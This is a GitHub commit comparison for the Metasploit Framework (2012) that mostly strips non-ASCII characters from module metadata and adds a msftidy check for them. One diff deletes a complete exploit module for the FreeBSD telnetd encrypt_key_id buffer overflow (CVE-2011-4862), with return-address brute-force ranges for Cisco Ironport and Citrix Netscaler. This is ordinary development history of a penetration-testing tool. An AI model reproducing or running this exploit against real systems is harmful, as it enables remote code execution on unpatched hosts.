Compare commits

...

13 Commits

Author SHA1 Message Date
Jonathan Cran 7f9cd45dca Merge branch 'release/20120110000001' into stable 2012-01-17 11:28:06 -06:00
Jonathan Cran 5700bf9db4 Merge branch 'release/20120110000001' of framework.github.com:rapid7/metasploit-framework into release/20120110000001 2012-01-13 13:48:37 -06:00
Tod Beardsley b3925c4465 Drop a spurious print_error line from smtp_version 2012-01-13 13:47:58 -06:00
Tod Beardsley f40df69100 Removing telnet_encrypt_keyid_bruteforce.rb to unstable
can't ship for a few problems, will be fixed up soonish but
about to release a build.
2012-01-11 14:06:34 -06:00
Tod Beardsley dd42f241f7 Death to unicode
Apologies to the authors whose names I am now intentionally misspelling.
Maybe in another 10 years, we can guarantee that all terminals and
machine parsers are okay with unicode suddenly popping up in strings.

Also adds a check in msftidy for stray unicode.
2012-01-11 14:00:26 -06:00
Jonathan Cran 15065ba627 fixup title 2012-01-11 11:15:15 -06:00
Jonathan Cran 9a37792328 Merge branch 'release/2012011000000' into stable 2012-01-10 09:49:11 -06:00
Jonathan Cran f52445930e Merge branch 'release/20120103000001' into stable 2012-01-09 10:12:56 -06:00
Jonathan Cran fdea0ad9c7 Merge branch 'release/20111227000001' into stable 2012-01-03 11:56:42 -06:00
Jonathan Cran 14270fe49f Merge branch 'release/20111219000001' into stable 2011-12-27 11:28:41 -06:00
Jonathan Cran 4259168703 Merge branch 'stable' of r7.github.com:rapid7/metasploit-framework into stable 2011-12-16 22:02:28 -06:00
Jenkins 5249e74ca7 Merge branch 'release/20111213184834' into stable 2011-12-13 19:39:52 -06:00
Jenkins cf0cbff302 Merge branch 'release/20111205000001' into stable 2011-12-13 18:26:13 -06:00
8 changed files with 19 additions and 142 deletions
+1 -1
View File
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'John the Ripper Linux Password Cracker',
'Name' => 'John the Ripper AIX Password Cracker',
'Version' => '$Revision$',
'Description' => %Q{
This module uses John the Ripper to identify weak passwords that have been
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' =>
[
'Justin Klein Keane', #Original Discovery
'Robin François <rof[at]navixia.com>'
'Robin Francois <rof[at]navixia.com>'
],
'License' => MSF_LICENSE,
'References' =>
@@ -37,7 +37,6 @@ class Metasploit3 < Msf::Auxiliary
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
print_status("#{ip}:#{rport} SMTP #{banner_sanitized}")
report_service(:host => rhost, :port => rport, :name => "smtp", :info => banner)
print_error("#{rhost}:#{rport} #{e} #{e.backtrace}")
end
end
@@ -1,134 +0,0 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'FreeBSD based telnetd encrypt_key_id brute force',
'Description' => %q{
This module exploits a buffer overflow in the encryption option handler of the
FreeBSD telnet service.
},
'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
'References' =>
[
['BID', '51182'],
['OSVDB', '78020'],
['CVE', '2011-4862'],
['URL', 'http://www.exploit-db.com/exploits/18280/']
],
'Privileged' => true,
'Payload' =>
{
'Space' => 128,
'BadChars' => "\x00",
},
'Platform' => [ 'bsd' ],
'Targets' =>
[
#
# specific targets
#
[ 'Cisco Ironport 7.x Bruteforce',
{
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x0805cffd },
'Stop' => { 'Ret' => 0x0805aa00 },
'Step' => 8
}
}
],
[ 'Citrix Netscaler 9.x',
{
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x0805bffd },
'Stop' => { 'Ret' => 0x08059000 },
'Step' => 8
}
}
],
[ 'Other FreeBSD based targets',
{
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x0805fffd },
'Stop' => { 'Ret' => 0x08050000 },
'Step' => 8
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 23 2011'))
register_options(
[
Opt::RPORT(23),
], self.class )
end
def brute_exploit(addrs)
curr_ret = addrs['Ret']
begin
connect
sock.get_once
print_status('Initiate encryption mode ...')
req = ''
req << "\xff\xfa\x26\x00\x01\x01\x12\x13"
req << "\x14\x15\x16\x17\x18\x19\xff\xf0"
req << "\x00"
sock.put(req)
sock.get_once
req = ''
print_status("Trying return address 0x%.8x..." % curr_ret )
print_status('Sending first payload ...')
req << "\xff\xfa\x26\x07"
req << "\x00"
req << make_nops(71)
penc = payload.encoded.gsub("\xff", "\xff\xff")
req << [curr_ret].pack('V')
req << [curr_ret].pack('V')
req << make_nops(128)
req << penc
req << "\x90\x90\x90\x90"
req << "\xff\xf0"
req << "\x00"
sock.put(req)
sock.get_once
print_status('Sending second payload ...')
sock.put(req)
disconnect
handler
rescue
end
end
end
+2 -2
View File
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'OP5 license.php Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary root command execution vulnerability in the
OP5 Monitor license.php. Ekelöw has confirmed that OP5 Monitor versions 5.3.5,
OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5,
5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
},
'Author' => [ 'Peter Osterberg <j[at]vel.nu>' ],
@@ -105,4 +105,4 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
end
end
end
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
# If it has the target footer, we know its vulnerable
# however skining may mean the reverse is not true
# We've only tested on v2.6.1, so that is all we will guarantee
# Example footer: v2.6.1 ©2008 Fonality
# Example footer: v2.6.1 &copy;2008 Fonality
# if response.body =~ /(v2\.(?:[0-5]\.\d|6\.[0-1]))\s{2}&copy;200[0-8] Fonality/
if response.body =~ /(v2\.6\.1)\s{2}&copy;2008 Fonality/
print_status "Trixbox #{$1} detected!"
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'Author' =>
[
'Knud Højgaard <keh[at]nsense.dk>', # Initial discovery
'Knud Hojgaard <keh[at]nsense.dk>', # Initial discovery
'mr_me <steventhomasseeley[at]gmail.com>', # Initial discovery & poc/msf
],
'References' =>
+13 -1
View File
@@ -3,7 +3,7 @@
# Check (recursively) for style compliance violations and other
# tree inconsistencies.
#
# by jduck
# by jduck and friends
#
##
@@ -82,6 +82,7 @@ def check_single_file(dparts, fparts, f_rel)
spaces = 0
bi = []
ll = []
bc = []
cr = 0
url_ok = true
nbo = 0 # non-bin open
@@ -113,6 +114,9 @@ def check_single_file(dparts, fparts, f_rel)
src_ended = true if ln =~ /^__END__$/
next if src_ended
if ln =~ /[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]/
bc << [ idx, ln.inspect]
end
if (ln.length > LONG_LINE_LENGTH)
ll << [ idx, ln ]
@@ -156,6 +160,14 @@ def check_single_file(dparts, fparts, f_rel)
}
end
if bc.length > 0
puts "%s ... probably has unicode: %u" % [f, bc.length]
bc.each { |ec|
ec[1] = ec[1].inspect
puts ' %8d: %s' % ec
}
end
show_count(f, 'carriage return EOL', cr)
show_missing(f, 'incorrect URL to framework site', url_ok)
show_missing(f, 'writes to stdout', no_stdio)